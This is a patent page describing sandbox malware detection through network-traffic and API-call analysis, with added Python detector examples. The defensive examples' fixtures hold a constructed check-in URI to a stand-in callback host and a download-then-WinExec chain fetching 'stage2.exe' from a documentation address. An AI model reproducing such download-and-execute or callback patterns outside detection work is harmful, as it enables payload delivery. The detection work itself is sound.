API functions are usually contained in the dynamic link library files under the Windows system directory. The Windows API is a set of predefined Windows functions used to control the appearance and behaviour of every part of Windows. Every action a user performs triggers one or several of these functions to notify Windows of what has happened. For example, when the user clicks a button on a form, Windows sends a message to the form; in VB this call is received and, after analysis, a particular event is generated. In other words, besides coordinating the execution of applications, allocating memory and managing system resources, the Windows system is also a very large service centre. Calling the various services of this service centre (each service can be understood as a function) helps an application open forms, draw graphics and use peripheral devices; because the objects served by these functions are applications, they are called API functions.
In a preferred embodiment, when the suspicious file executes in the sandbox, all the API functions it calls at run time, together with their corresponding parameter information, can be monitored and recorded through system interfaces or by actively modifying the system's operating flow. In a specific implementation, the API functions called by the suspicious file within a preset time, starting from the initial environment state, are recorded in order. For example, the suspicious file calls in turn WNetAddConnection (creates a permanent connection to a network resource), PostThreadMessage (delivers a message to an application), CreateDirectory (creates a new directory) and CreateFile (opens or creates files, pipes, mailslots, communication services, devices, consoles and the like), forming an operation sequence made up of multiple API functions. By analysing whether each API function and its parameters have malicious characteristics or purposes, and by matching the similarity between the sequence of API function operations called by the suspicious file and the sequences of API function operations executed by normal files, it can be judged whether the suspicious file exhibits malicious behaviour, and hence whether the suspicious file is a malicious file.
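The per-call parameter analysis and sequence similarity matching just described, as an added Python example (not the patent's code): the parameter checks, the normal-file profiles and the recorded call traces are constructed, and similarity is measured with difflib's SequenceMatcher over the ordered API names.

```python
"""Judge a recorded API call trace by per-call parameter checks and sequence similarity."""
import difflib
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiCall:
    name: str
    args: tuple


def _check_wnet(args):
    """WNetAddConnection to a UNC path: a persistent connection to a remote share."""
    remote = str(args[0])
    return f"persistent connection to remote share {remote}" if remote.startswith("\\\\") else None


def _check_createfile(args):
    """CreateFile with write access under the system directory."""
    path, access = str(args[0]).lower(), str(args[1]).upper()
    if "\\windows\\system32\\" in path and "WRITE" in access:
        return f"writes into the system directory: {args[0]}"
    return None


# Per-call parameter checks (constructed heuristics): API name -> function(args) -> reason or None.
PARAMETER_CHECKS = {"WNetAddConnection": _check_wnet, "CreateFile": _check_createfile}


def parameter_findings(calls):
    """Malicious characteristics found in individual calls, in call order."""
    findings = []
    for i, call in enumerate(calls):
        check = PARAMETER_CHECKS.get(call.name)
        reason = check(call.args) if check else None
        if reason:
            findings.append((i, call.name, reason))
    return findings


def sequence_similarity(calls, profile):
    """Similarity (0..1) between the order of API names in a trace and a normal-file profile."""
    names = [c.name for c in calls]
    return difflib.SequenceMatcher(None, names, profile, autojunk=False).ratio()


def judge_by_api(calls, normal_profiles, threshold=0.6):
    """Malicious if any parameter check fires, or if the call order resembles no normal profile."""
    findings = parameter_findings(calls)
    best = max((sequence_similarity(calls, p) for p in normal_profiles), default=0.0)
    verdict = bool(findings) or best < threshold
    return verdict, {"findings": findings, "best_similarity": round(best, 3)}


# Constructed trace of a suspicious file, following the call order given in the text.
SUSPICIOUS_TRACE = [
    ApiCall("WNetAddConnection", (r"\\10.0.0.5\share", "Z:")),
    ApiCall("PostThreadMessage", (4120, "WM_USER+1")),
    ApiCall("CreateDirectory", (r"C:\Windows\System32\drv",)),
    ApiCall("CreateFile", (r"C:\Windows\System32\drv\x.exe", "GENERIC_WRITE")),
]

# Constructed API-order profiles of normal files (for example, an editor saving a document).
NORMAL_PROFILES = [
    ["CreateDirectory", "CreateFile", "WriteFile", "CloseHandle"],
    ["CreateFile", "ReadFile", "CloseHandle"],
]

# Constructed trace of a normal file, for comparison.
BENIGN_TRACE = [
    ApiCall("CreateDirectory", (r"C:\Users\u\out",)),
    ApiCall("CreateFile", (r"C:\Users\u\out\report.txt", "GENERIC_WRITE")),
    ApiCall("WriteFile", (0x1C, b"...")),
    ApiCall("CloseHandle", (0x1C,)),
]
```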
In a preferred embodiment, a network traffic detection capability at the level of a single file is added on top of the detection and analysis of the suspicious file's dynamic behaviour, so that known or unknown attack behaviour is identified and a single file is identified and characterised as malicious or not from the network traffic dimension, which improves the detection of malicious files and reduces network security threats.
Furthermore, since suspicious files make up only a limited percentage of all files, detection efficiency can be improved by executing multiple files (suspicious and non-suspicious) in the sandbox at the same time and performing a comprehensive detection and analysis of the dynamic behaviour features and network traffic packets produced while these files execute, so as to judge whether malicious files are present among them. For example, suppose there are 100 files in total, 2 of which are suspicious, but the positions of these 2 suspicious files among the 100 are unknown. Detecting and analysing 1 file at a time requires 100 detection and analysis operations, one per file, to finally find the 2 suspicious files. To improve efficiency, the files can instead be divided into groups of 10; detecting and analysing 1 group at a time then requires only 10 detection and analysis operations, one per group. If a suspicious file is found in a particular group of 10, that group is divided further until the suspicious file is found, while every group in which no suspicious file is found can be passed normally without further checking.
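The group-wise procedure above as an added Python example (not the patent's code); the sandbox run of a group is stood in for by a constructed oracle that only answers whether some member of the group is suspicious, which is exactly why a positive group has to be split further.

```python
"""Group-wise detection: analyse files in groups, pass clean groups, split positive ones."""


def find_suspicious(files, group_is_suspicious, group_size=10):
    """Return (suspicious files found, number of sandbox analyses performed).

    group_is_suspicious(group) stands for one combined detection and analysis of the dynamic
    behaviour and network traffic produced while the whole group executes; it only says
    whether *some* member is suspicious, so a positive group is divided and analysed again."""
    found, analyses = [], 0
    pending = [files[i:i + group_size] for i in range(0, len(files), group_size)]
    while pending:
        group = pending.pop()
        analyses += 1
        if not group_is_suspicious(group):
            continue                       # nothing found: the whole group passes
        if len(group) == 1:
            found.append(group[0])         # a suspicious file has been isolated
            continue
        mid = len(group) // 2              # divide the group and analyse each half
        pending.extend((group[:mid], group[mid:]))
    return sorted(found), analyses


def one_by_one(files, is_suspicious):
    """The baseline the text compares against: one analysis per file."""
    return sorted(f for f in files if is_suspicious([f])), len(files)


# Constructed scenario from the text: 100 files, 2 of them suspicious at unknown positions.
FILES = [f"sample_{i:03d}.bin" for i in range(100)]
_HIDDEN_SUSPICIOUS = {"sample_017.bin", "sample_083.bin"}  # known only to the "sandbox"


def sandbox_group_run(group):
    """Stand-in for executing a group in the sandbox and analysing what it produced."""
    return any(f in _HIDDEN_SUSPICIOUS for f in group)
```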
By executing the suspicious file in a customised virtualised environment such as a sandbox, interference from the network traffic of the operating system and other applications is excluded; the dynamic behaviour operation sequence and the network traffic packets produced while the suspicious file runs are monitored, captured and stored, then detected and analysed separately, and finally whether the suspicious file is a malicious file is detected and identified from the two dimensions of its dynamic behaviour features and its network traffic.
It should be noted that, for brevity, each of the foregoing method embodiments is expressed as a series of combined actions; those skilled in the art should understand, however, that the application is not limited by the described order of actions, since according to the application some steps may be performed in other orders or simultaneously. Secondly, those skilled in the art should also understand that the embodiments described in this specification are preferred embodiments, and that the actions and modules involved are not necessarily required by the application.
From the above description of the embodiments, those skilled in the art can clearly understand that the method of analysing network data according to the above embodiments may be implemented by software plus the necessary general-purpose hardware platform, or of course by hardware, but in many cases the former is the better implementation. Based on this understanding, the technical solution of the application, or the part of it that contributes over the prior art, can be embodied in the form of a software product stored in a storage medium (such as ROM/RAM, a magnetic disk or an optical disc) and including instructions that cause a terminal device (which may be a mobile phone, a computer, a server, a network device or the like) to perform the method described in each embodiment of the application.
Embodiment 2
According to an embodiment of the application, a device embodiment for implementing the above method of analysing network data is also provided. Fig. 3 is a structural block diagram of the device for analysing network data according to an embodiment of the application. As shown in Fig. 3, the device includes: a first acquisition module 10, for obtaining the network traffic packets produced while the file to be detected runs in the virtualised environment; and a first analysis module 20, for detecting and analysing the network traffic packets to judge whether the file to be detected is a file of the particular type.
In the embodiment of the application, a file to be detected (for example, a suspicious file) that may be a file of the particular type (for example, a malicious file) is executed in a customised virtualised environment (for example, a sandbox), so as to exclude interference from the network traffic of the operating system and other applications; the network traffic packets produced while the suspicious file runs are monitored, captured and stored, and these packets are then detected and analysed, so that malicious files are detected and identified from the dimension of the network traffic related to the suspicious file.
In a specific implementation, the sources of suspicious files can include, but are not limited to: instant messaging software, mailbox attachments, and files uploaded to or downloaded from the network; a user submission system can of course also be created so that users actively submit suspicious files. The sandbox is an engineered, customised virtualised environment for executing suspicious files; it emulates a real environment closely, and its functional characteristic is that, apart from actively executing the suspicious file, it introduces no behavioural interference from the operating system or other application software that could affect the detection and analysis results. The virtual machine environment can include, but is not limited to, desktop personal computer (PC) operating systems, mobile operating systems and server operating systems including Windows, Linux, Android and iOS, and of course also virtual execution by parsing and simulated execution.
Taking a guest operating system (Guest OS) as an example, the sandbox must first be started; the suspicious file is then uploaded from the host to the Guest OS over the virtual network connection, the Guest OS completes the monitoring and capture of the network traffic packets, and the packets are then detected and analysed, so that malicious files are detected and identified from the dimension of the network traffic related to the suspicious file.
In a preferred embodiment, the network traffic packets produced while the suspicious file runs in the customised virtualised environment can be monitored, captured and stored, and then detected and analysed, so that malicious files are detected and identified relying solely on this dimension of the network traffic related to the suspicious file.
Optionally, the first analysis module 20 is configured to judge whether the suspicious file is a malicious file according to whether a single network traffic packet contains a parameter of the preset type, or according to whether the preset rule is satisfied among multiple mutually related network traffic packets.
When the sandbox executes the suspicious file, all network traffic through the sandbox's network interface can be captured with a traffic capture and analysis tool (for example, tcpdump), or the traffic of the sandbox's network interface can be mirrored, and the network traffic produced while the sandbox executes the suspicious file is stored.
Whether the suspicious file is a malicious file is judged by analysing the network traffic produced while it executes. Specifically, if, by parsing a single network traffic packet and analysing the network protocol features of the transport layer protocol (for example, the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP)) and/or the application layer protocol (for example, the Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Domain Name System (DNS), Network File System (NFS), Simple Mail Transfer Protocol (SMTP) or Simple Network Management Protocol (SNMP)), it can be determined that the single packet contains parameter information that it should not carry (for example, strings that perform malicious behaviour), then on that basis the suspicious file can be identified as a malicious file.
It should be noted that the parameter information above can be obtained by repeatedly performing static analysis experiments on a large number of samples of different types and summarising the parameters related to malicious behaviour; these are then set as the preset-type parameters used as the reference for comparison in subsequent detection and analysis.
If, however, parsing a single network traffic packet cannot accurately determine whether the suspicious file is a malicious file, then whether the suspicious file exhibits malicious network behaviour must be judged from whether the preset rule is satisfied among multiple mutually related network traffic packets.
It should be noted that the preset rule mainly manifests as the multiple network traffic packets produced in relation to the same particular event breaking the original normal communication interaction flow, thereby causing important information related to the user's identity authentication to leak.
Optionally, the first analysis module 20 is configured to determine that the suspicious file is a malicious file when a single network traffic packet contains a parameter of the preset type, or that the suspicious file is not a malicious file when the single network traffic packet does not contain a parameter of the preset type.
Optionally, a first judgement module 30 is configured to determine that the suspicious file is a malicious file when the preset rule is satisfied among multiple mutually related network traffic packets, or that the suspicious file is not a malicious file when the preset rule is not satisfied among them.
From the above analysis, if parsing a single network traffic packet cannot accurately determine whether the suspicious file is a malicious file, then whether the suspicious file exhibits malicious network behaviour must be judged from whether the preset rule is satisfied among multiple mutually related network traffic packets.
Optionally, as shown in Fig. 4, the device further includes: a second acquisition module 30, for obtaining the API functions called while the suspicious file runs in the virtualised environment and the parameter lists corresponding to those API functions; and a second analysis module 40, for detecting and analysing the API functions and their corresponding parameter lists to judge whether the suspicious file is a malicious file.
It should be noted that the process in Fig. 4 in which the second acquisition module 30 and the second analysis module 40 obtain the second detection and analysis result by detecting and analysing the API functions and their corresponding parameter lists is independent of the process in which the first acquisition module 10 and the first analysis module 20 obtain the first detection and analysis result by detecting and analysing the network traffic packets, and there is no fixed order of execution between them. In other words, the process in which the second acquisition module 30 and the second analysis module 40 obtain the second detection and analysis result may be arranged before the first acquisition module 10, after the first analysis module 20, or of course between the first acquisition module 10 and the first analysis module 20.
Embodiment 3
An embodiment of the application can provide a computer terminal, which may be any computer terminal in a group of computer terminals. Optionally, in this embodiment, the computer terminal may also be replaced by a terminal device such as a mobile terminal.
Optionally, in this embodiment, the computer terminal may be at least one of multiple network devices located in a computer network.
Optionally, Fig. 5 is a structural block diagram of a server according to an embodiment of the application. As shown in Fig. 5, the server may include one or more processors (only one is shown in the figure) and a memory.
The memory can be used to store software programs and modules, such as the program instructions/modules corresponding to the method and device for analysing network data in the embodiment of the application; by running the software programs and modules stored in the memory, the processor executes the various functional applications and data processing, that is, implements the above method of analysing network data. The memory may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory or other non-volatile solid-state memory. In some examples the memory may further include memory located remotely from the processor, and such remote memory may be connected to terminal A over a network. Examples of such a network include, but are not limited to, the Internet, intranets, local area networks, mobile communication networks and combinations thereof.
Through the transmission device, the processor can call the information and application programs stored in the memory to perform the following steps:
S1: obtain the network traffic packets produced while the file to be detected runs in the virtualised environment;
S2: detect and analyse the network traffic packets to judge whether the file to be detected is a file of the particular type.
Optionally, the processor can also execute program code for the following steps: judging whether the file to be detected is a file of the particular type according to whether a single network traffic packet contains a parameter of the preset type; judging whether the file to be detected is a file of the particular type according to whether the preset rule is satisfied among multiple mutually related network traffic packets.
Optionally, the processor can also execute program code for the following steps: when a single network traffic packet contains a parameter of the preset type, determining that the file to be detected is a file of the particular type; when the single network traffic packet does not contain a parameter of the preset type, determining that the file to be detected is not a file of the particular type.
Optionally, the processor can also execute program code for the following steps: when the preset rule is satisfied among multiple mutually related network traffic packets, determining that the file to be detected is a file of the particular type; when the preset rule is not satisfied among the multiple mutually related network traffic packets, determining that the file to be detected is not a file of the particular type.
Optionally, the processor can also execute program code for the following steps: obtaining the application programming interface (API) functions called while the file to be detected runs in the virtualised environment; detecting and analysing the API functions and the parameter lists corresponding to them to judge whether the file to be detected is a file of the particular type.
By obtaining the network traffic packets produced while the file to be detected runs in the virtualised environment and detecting and analysing those packets to judge whether the file to be detected is a file of the particular type, the embodiment of the application achieves the purpose of detecting whether the file to be detected contains traffic of the particular type, and hence of detecting and identifying files of the particular type. This improves the detection accuracy for files of the particular type and reduces network security threats, and thereby solves the technical problem in the related art that the network traffic produced while a file to be detected runs in a virtualised environment cannot be analysed and used as the basis for judging whether that file is a file of the particular type.
Furthermore, files of the particular type can also be detected and identified on the basis of both the dynamic behaviour and the network traffic produced when a single file executes in the virtual environment; that is, in a preferred embodiment, both the file behaviour feature dimension and the network traffic feature dimension are used to identify and characterise whether a file is a file of the particular type, improving the detection of such files and reducing network security threats.
Those skilled in the art will understand that the structure shown in Fig. 5 is merely illustrative; the computer terminal may also be a smartphone (such as an Android or iOS phone), a tablet computer, a palmtop computer, a mobile Internet device (MID), a PAD or another terminal device. Fig. 5 does not limit the structure of the electronic device described above; for example, the computer terminal may include more or fewer components than shown in Fig. 5 (such as a network interface or a display device), or have a configuration different from that shown in Fig. 5.
Those of ordinary skill in the art will understand that all or part of the steps of the methods in the above embodiments can be completed by a program instructing the relevant hardware of the terminal device; the program can be stored in a computer-readable storage medium, which may include: a flash disk, read-only memory (ROM), random access memory (RAM), a magnetic disk or an optical disc.
Embodiment 4
An embodiment of the application also provides a storage medium. Optionally, in this embodiment, the storage medium may be used to store the program code executed by the method of analyzing network data provided in Embodiment 1 above.
Optionally, in this embodiment, the storage medium may be located in any terminal of a group of computer terminals in a computer network, or in any mobile terminal of a group of mobile terminals.
Optionally, in this embodiment, the storage medium is arranged to store program code for performing the following steps:
S1: obtaining a network traffic packet generated while a file to be detected runs in a virtualized environment;
S2: detecting and analyzing the network traffic packet to judge whether the file to be detected is a file of a particular type.
Optionally, the storage medium is further arranged to store program code for performing the following steps: judging whether the file to be detected is a file of the particular type according to whether a single network traffic packet contains a preset-type parameter; judging whether the file to be detected is a file of the particular type according to whether a plurality of mutually related network traffic packets meet a preset rule.
Optionally, the storage medium is further arranged to store program code for performing the following steps: when a single network traffic packet contains the preset-type parameter, judging that the file to be detected is a file of the particular type; when a single network traffic packet does not contain the preset-type parameter, judging that the file to be detected is not a file of the particular type.
Optionally, the storage medium is further arranged to store program code for performing the following steps: when the plurality of mutually related network traffic packets meet the preset rule, judging that the file to be detected is a file of the particular type; when the plurality of mutually related network traffic packets do not meet the preset rule, judging that the file to be detected is not a file of the particular type.
Optionally, the storage medium is further arranged to store program code for performing the following steps: obtaining the application programming interface (API) functions called while the file to be detected runs in the virtualized environment; detecting and analyzing the API functions and the parameter lists corresponding to the API functions to judge whether the file to be detected is a file of the particular type.
The sequence numbers of the above embodiments of the application are for description only and do not indicate the relative merits of the embodiments.
In the above embodiments of the application, each embodiment is described with its own emphasis; for any part not described in detail in one embodiment, refer to the related description of the other embodiments.
In the several embodiments provided in this application, it should be understood that the disclosed technical content may be implemented in other ways. The apparatus embodiments described above are only illustrative. For example, the division into units is only a division by logical function, and other divisions are possible in actual implementation: several units or components may be combined or integrated into another system, or some features may be omitted or not performed. Further, the mutual coupling, direct coupling or communication connection shown or discussed may be an indirect coupling or communication connection through some interfaces, units or modules, and may be electrical or of another form.
Units described as separate components may or may not be physically separate, and components shown as units may or may not be physical units; they may be located in one place or distributed over a plurality of network elements. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, the functional units in the embodiments of the application may be integrated into one processing unit, or each unit may exist physically on its own, or two or more units may be integrated into one unit. The integrated unit may be implemented in the form of hardware or in the form of a software functional unit.
If the integrated unit is implemented in the form of a software functional unit and is sold or used as an independent product, it may be stored in a computer-readable storage medium. On this understanding, the technical solution of the application, in essence or in the part that contributes to the prior art, or all or part of the technical solution, may be embodied in the form of a software product. The computer software product is stored in a storage medium and includes instructions for causing a computer device (which may be a personal computer, a server, a network device or the like) to perform all or some of the steps of the methods of the embodiments of the application. The storage medium includes a USB flash disk, a read-only memory (ROM), a random access memory (RAM), a removable hard disk, a magnetic disk, an optical disc or any other medium that can store program code.
The above is only the preferred embodiment of the application. It should be noted that a person of ordinary skill in the art may make several improvements and modifications without departing from the principles of the application, and these improvements and modifications should also be regarded as falling within the scope of protection of the application.

Claims (16)

  1. A system for analyzing network data, characterized by comprising: a virtualized environment and an instruction set simulation environment;
    the virtualized environment is configured to detect and analyze a network traffic packet generated while a file to be detected runs in the virtualized environment, and to judge whether the file to be detected is a file of a particular type;
    the instruction set simulation environment is configured to detect and analyze the application programming interface (API) functions called while the file to be detected runs in the virtualized environment and the parameter lists corresponding to the API functions, and to judge whether the file to be detected is a file of the particular type.
  2. The system according to claim 1, characterized in that the virtualized environment is a virtual machine.
  3. The system according to claim 1, characterized in that the instruction set simulation environment is simulator-based virtual machine software.
  4. A method for analyzing network data, characterized by comprising:
    obtaining a network traffic packet generated while a file to be detected runs in a virtualized environment;
    detecting and analyzing the network traffic packet to judge whether the file to be detected is a file of a particular type.
  5. The method according to claim 4, characterized in that detecting and analyzing the network traffic packet to judge whether the file to be detected is a file of the particular type comprises:
    judging whether the file to be detected is a file of the particular type according to whether a single network traffic packet contains a preset-type parameter.
  6. The method according to claim 4, characterized in that detecting and analyzing the network traffic packet to judge whether the file to be detected is a file of the particular type comprises:
    judging whether the file to be detected is a file of the particular type according to whether a plurality of mutually related network traffic packets meet a preset rule.
  7. The method according to claim 5, characterized in that judging whether the file to be detected is a file of the particular type according to whether the single network traffic packet contains the preset-type parameter comprises one of the following:
    when the single network traffic packet contains the preset-type parameter, judging that the file to be detected is a file of the particular type;
    when the single network traffic packet does not contain the preset-type parameter, judging that the file to be detected is not a file of the particular type.
  8. The method according to claim 6, characterized in that judging whether the file to be detected is a file of the particular type according to whether the plurality of mutually related network traffic packets meet the preset rule comprises one of the following:
    when the plurality of mutually related network traffic packets meet the preset rule, judging that the file to be detected is a file of the particular type;
    when the plurality of mutually related network traffic packets do not meet the preset rule, judging that the file to be detected is not a file of the particular type.
  9. The method according to claim 4, characterized in that the method further comprises:
    obtaining the application programming interface (API) functions called while the file to be detected runs in the virtualized environment and the parameter lists corresponding to the API functions;
    detecting and analyzing the API functions and the parameter lists corresponding to the API functions to judge whether the file to be detected is a file of the particular type.
  10. The method according to any one of claims 4 to 9, characterized in that the virtualized environment is applied to a virtual machine.
  11. The method according to any one of claims 4 to 9, characterized in that the file of the particular type is a malicious file.
  12. An apparatus for analyzing network data, characterized by comprising:
    a first acquisition module, configured to obtain a network traffic packet generated while a file to be detected runs in a virtualized environment;
    a first analysis module, configured to detect and analyze the network traffic packet to judge whether the file to be detected is a file of a particular type.
  13. The apparatus according to claim 12, characterized in that the first analysis module is configured to judge whether the file to be detected is a file of the particular type according to whether a single network traffic packet contains a preset-type parameter; or to judge whether the file to be detected is a file of the particular type according to whether a plurality of mutually related network traffic packets meet a preset rule.
  14. The apparatus according to claim 13, characterized in that the first analysis module is configured, when the single network traffic packet contains the preset-type parameter, to judge that the file to be detected is a file of the particular type; or, when the single network traffic packet does not contain the preset-type parameter, to judge that the file to be detected is not a file of the particular type.
  15. The apparatus according to claim 13, characterized in that the first analysis module is configured, when the plurality of mutually related network traffic packets meet the preset rule, to judge that the file to be detected is a file of the particular type; or, when the plurality of mutually related network traffic packets do not meet the preset rule, to judge that the file to be detected is not a file of the particular type.
  16. The apparatus according to claim 12, characterized in that the apparatus further comprises:
    a second acquisition module, configured to obtain the application programming interface (API) functions called while the file to be detected runs in the virtualized environment and the parameter lists corresponding to the API functions;
    a second analysis module, configured to detect and analyze the API functions and the parameter lists corresponding to the API functions to judge whether the file to be detected is a file of the particular type.
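The following Python module is an added example written for this page; it is not the patent's or Alibaba's code. It sketches the three judgements that Embodiment 4 (steps S1 and S2 with their optional variants) and claims 4 to 9 and 12 to 16 describe: a single-packet check for a preset-type parameter, a preset rule over several mutually related packets (here, periodic beaconing to one host and port, which no single packet reveals), and a check of API functions together with their parameter lists (here, a file fetched by `URLDownloadToFileA` and then handed to `WinExec`). The packet and API-call records are constructed sample data standing in for what a sandbox run would record, and the marker strings, the beacon thresholds and the choice of API names in the rules are assumptions made for illustration.

```python
"""Added example: sandbox-run classifier in the style of CN107483386A.

Not the patent's code. Packets and API calls below are constructed sample data,
and every rule (markers, thresholds, API names) is an assumption for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Packet:
    ts: float        # seconds since the sample started running in the sandbox
    dst: str         # destination host (constructed value)
    dport: int       # destination port
    payload: bytes   # application-layer bytes of the packet


@dataclass(frozen=True)
class ApiCall:
    name: str        # API function name recorded by the monitor
    params: tuple    # its parameter list, in call order


# Judgement 1 (claims 5 and 7): one packet carrying a preset-type parameter is
# enough to flag the file. Constructed markers, not real indicators.
PRESET_PARAMS = (
    b"GET /gate.php?id=",          # constructed check-in URI
    b"Host: c2.example.invalid",   # constructed callback host
)


def single_packet_hit(packets):
    """Return the first packet whose payload carries a preset-type parameter, else None."""
    for p in packets:
        if any(marker in p.payload for marker in PRESET_PARAMS):
            return p
    return None


# Judgement 2 (claims 6 and 8): a preset rule over mutually related packets.
# Related here means "same destination host and port"; the rule fires when at
# least MIN_BEACONS packets go there at a near-constant interval.
MIN_BEACONS = 3      # assumption
MAX_JITTER = 0.25    # assumption: allowed stdev / mean of inter-packet gaps


def correlated_packets_hit(packets):
    """Return the (host, port) that looks like a beacon channel, else None."""
    by_dest = defaultdict(list)
    for p in packets:
        by_dest[(p.dst, p.dport)].append(p.ts)
    for dest, stamps in by_dest.items():
        if len(stamps) < MIN_BEACONS:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= MAX_JITTER:
            return dest
    return None


# Judgement 3 (claims 9 and 16): API functions plus their parameter lists.
# Rule: a path written by URLDownloadToFileA(pCaller, szURL, szFileName, ...)
# is later passed as the command line of WinExec(lpCmdLine, uCmdShow).
def api_hit(calls):
    """Return (url, path) if a download-then-execute chain is seen, else None."""
    downloaded = {}   # local path -> URL it was fetched from
    for c in calls:
        if c.name == "URLDownloadToFileA" and len(c.params) >= 3:
            downloaded[c.params[2]] = c.params[1]
        elif c.name == "WinExec" and c.params and c.params[0] in downloaded:
            return downloaded[c.params[0]], c.params[0]
    return None


def classify(packets, calls):
    """Combine the judgements; any hit marks the file as the particular type."""
    hits = {
        "single_packet": single_packet_hit(packets),
        "correlated_packets": correlated_packets_hit(packets),
        "api_parameters": api_hit(calls),
    }
    return {"is_particular_type": any(v is not None for v in hits.values()),
            "hits": hits}


# Constructed sample runs (not captures). Addresses are documentation ranges.
BENIGN_RUN = (
    [Packet(0.1, "updates.example.invalid", 443, b"\x16\x03\x01"),
     Packet(4.7, "updates.example.invalid", 443, b"\x17\x03\x03")],
    [ApiCall("CreateFileW", ("C:\\Users\\user\\report.txt",))],
)
SUSPECT_RUN = (
    [Packet(1.0, "203.0.113.7", 8080, b"GET /gate.php?id=abc HTTP/1.1\r\n"),
     Packet(61.0, "203.0.113.7", 8080, b"GET /gate.php?id=abc HTTP/1.1\r\n"),
     Packet(121.2, "203.0.113.7", 8080, b"GET /gate.php?id=abc HTTP/1.1\r\n")],
    [ApiCall("URLDownloadToFileA",
             (0, "http://203.0.113.7/stage2.exe", "C:\\Temp\\s2.exe", 0, 0)),
     ApiCall("WinExec", ("C:\\Temp\\s2.exe", 0))],
)

if __name__ == "__main__":
    for label, run in (("benign", BENIGN_RUN), ("suspect", SUSPECT_RUN)):
        print(label, classify(*run))
```

The split into three independent judgements mirrors the claims: the single-packet rule is cheap and precise but only catches what a packet says on its own, the correlated-packet rule catches timing structure that survives payload changes, and the API rule supplies the file-behaviour dimension the description pairs with the traffic dimension. A real deployment would load the markers and thresholds from a maintained rule set rather than hard-code them as done here.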

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201610404659.2A CN107483386A (en) 2016-06-08 2016-06-08 Analyze the method and device of network data

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201610404659.2A CN107483386A (en) 2016-06-08 2016-06-08 Analyze the method and device of network data

Publications (1)

Publication Number Publication Date
CN107483386A true CN107483386A (en) 2017-12-15

Family

ID=60594586

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201610404659.2A Pending CN107483386A (en) 2016-06-08 2016-06-08 Analyze the method and device of network data

Country Status (1)

Country Link
CN (1) CN107483386A (en)


Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101373502A (en) * 2008-05-12 2009-02-25 公安部第三研究所 Automatic analysis system of virus behavior based on Win32 platform
CN102034050A (en) * 2011-01-25 2011-04-27 四川大学 Dynamic malicious software detection method based on virtual machine and sensitive Native application programming interface (API) calling perception
CN102244622A (en) * 2011-07-25 2011-11-16 北京网御星云信息技术有限公司 Virtual gateway protection method, virtual security gateway and system for server virtualization
CN102254120A (en) * 2011-08-09 2011-11-23 成都市华为赛门铁克科技有限公司 Method, system and relevant device for detecting malicious codes
CN104200161A (en) * 2014-08-05 2014-12-10 杭州安恒信息技术有限公司 Method for achieving intelligent sandbox file detection and intelligent sandbox detection system based on method
CN105022960A (en) * 2015-08-10 2015-11-04 济南大学 Multi-feature mobile terminal malicious software detecting method based on network flow and multi-feature mobile terminal malicious software detecting system based on network flow


Cited By (11)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN108040064A (en) * 2017-12-22 2018-05-15 北京知道创宇信息技术有限公司 Data transmission method, device, electronic equipment and storage medium
CN113132341A (en) * 2020-01-16 2021-07-16 深信服科技股份有限公司 Network attack behavior detection method and device, electronic equipment and storage medium
CN113132341B (en) * 2020-01-16 2023-03-21 深信服科技股份有限公司 Network attack behavior detection method and device, electronic equipment and storage medium
CN112003824A (en) * 2020-07-20 2020-11-27 ***股份有限公司 Attack detection method and device and computer readable storage medium
CN112003824B (en) * 2020-07-20 2023-04-18 ***股份有限公司 Attack detection method and device and computer readable storage medium
CN114697049A (en) * 2020-12-14 2022-07-01 中国科学院计算机网络信息中心 WebShell detection method and device
CN114697049B (en) * 2020-12-14 2024-04-12 中国科学院计算机网络信息中心 WebShell detection method and device
CN113132385A (en) * 2021-04-20 2021-07-16 广州锦行网络科技有限公司 Method and device for preventing gateway ARP spoofing
CN113612661A (en) * 2021-08-03 2021-11-05 北京安天网络安全技术有限公司 Method, device, computing equipment and storage medium for checking program stability
CN114070820A (en) * 2021-11-11 2022-02-18 南京指掌易信息科技有限公司 Domain name redirection method, device, medium and electronic equipment
CN114070820B (en) * 2021-11-11 2023-09-01 南京指掌易信息科技有限公司 Domain name redirection method, device, medium and electronic equipment

Similar Documents

Publication Publication Date Title
Baykara et al. A novel honeypot based security approach for real-time intrusion detection and prevention systems
Nadler et al. Detection of malicious and low throughput data exfiltration over the DNS protocol
US11783035B2 (en) Multi-representational learning models for static analysis of source code
CN107483386A (en) Analyze the method and device of network data
US11816214B2 (en) Building multi-representational learning models for static analysis of source code
US20230370439A1 (en) Network action classification and analysis using widely distributed honeypot sensor nodes
CN107347047A (en) Attack guarding method and device
CN110348210B (en) Safety protection method and device
US11636208B2 (en) Generating models for performing inline malware detection
US11374946B2 (en) Inline malware detection
Zhang et al. ScanMe mobile: a cloud-based Android malware analysis service
CN112688932A (en) Honeypot generation method, honeypot generation device, honeypot generation equipment and computer readable storage medium
Onik et al. A novel approach for network attack classification based on sequential questions
CN114531258B (en) Network attack behavior processing method and device, storage medium and electronic equipment
Aguirre-Anaya et al. A new procedure to detect low interaction honeypots
Zhao et al. Network security model based on active defense and passive defense hybrid strategy
Goyal et al. Application of Deep Learning in Honeypot Network for Cloud Intrusion Detection
Kumar et al. A Review on Recent Advances & Future Trends of Security in Honeypot.
TWI741698B (en) Method for detecting malicious attacks and network security management device
JP2022541250A (en) Inline malware detection
Sobesto Empirical studies based on honeypots for characterizing attackers behavior
Rafique et al. Xminer: Nip the zero day exploits in the bud
CN112637217B (en) Active defense method and device of cloud computing system based on bait generation
Felix et al. Framework for Analyzing Intruder Behavior of IoT Cyber Attacks Based on Network Forensics by Deploying Honeypot Technology
US20220245249A1 (en) Specific file detection baked into machine learning pipelines

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication Application publication date: 20171215